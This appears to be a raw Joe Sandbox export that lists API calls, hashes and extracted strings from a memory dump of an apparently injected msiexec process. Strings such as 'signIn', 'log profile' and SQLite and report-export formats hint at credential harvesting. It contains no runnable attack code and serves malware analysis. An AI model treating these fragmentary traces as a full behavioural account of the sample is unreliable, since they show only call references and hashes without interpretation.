                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Dialog$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3975816621-0
                                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                              APIs
                                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                                              • API String ID: 1214746602-2708368587
                                                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                              • memset.MSVCRT ref: 00405E33
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                              • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                              • String ID:
                                                                                              • API String ID: 2313361498-0
                                                                                              • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                              • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                                              • String ID:
                                                                                              • API String ID: 2047574939-0
                                                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                              APIs
                                                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                              • String ID:
                                                                                              • API String ID: 4218492932-0
                                                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                              APIs
                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: gj
                                                                                              • API String ID: 438689982-4203073231
                                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                              • API String ID: 3510742995-2446657581
                                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                              • memset.MSVCRT ref: 00405ABB
                                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 4281309102-0
                                                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfwcscat
                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                              • API String ID: 384018552-4153097237
                                                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 2029023288-3849865405
                                                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                              APIs
                                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                              • memset.MSVCRT ref: 00405455
                                                                                              • memset.MSVCRT ref: 0040546C
                                                                                              • memset.MSVCRT ref: 00405483
                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy$ErrorLast
                                                                                              • String ID: 6$\
                                                                                              • API String ID: 404372293-1284684873
                                                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesErrorFileLastSleep$free
                                                                                              • String ID:
                                                                                              • API String ID: 1470729244-0
                                                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1331804452-0
                                                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                              APIs
                                                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                              • String ID: advapi32.dll
                                                                                              • API String ID: 2012295524-4050573280
                                                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                              APIs
                                                                                              Strings
                                                                                              • <%s>, xrefs: 004100A6
                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf
                                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                              • API String ID: 3473751417-2880344631
                                                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscat$_snwprintfmemset
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 2521778956-791839006
                                                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfwcscpy
                                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                                              • API String ID: 999028693-502967061
                                                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 00408DFA
                                                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                              • memset.MSVCRT ref: 00408E46
                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2350177629-0
                                                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                              • API String ID: 2221118986-1606337402
                                                                                              • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                              • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                              APIs
                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                              • memset.MSVCRT ref: 00408FD4
                                                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                              • memset.MSVCRT ref: 00409042
                                                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                              • String ID:
                                                                                              • API String ID: 265355444-0
                                                                                              • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                              • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004116FF
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                              • API String ID: 2618321458-3614832568
                                                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
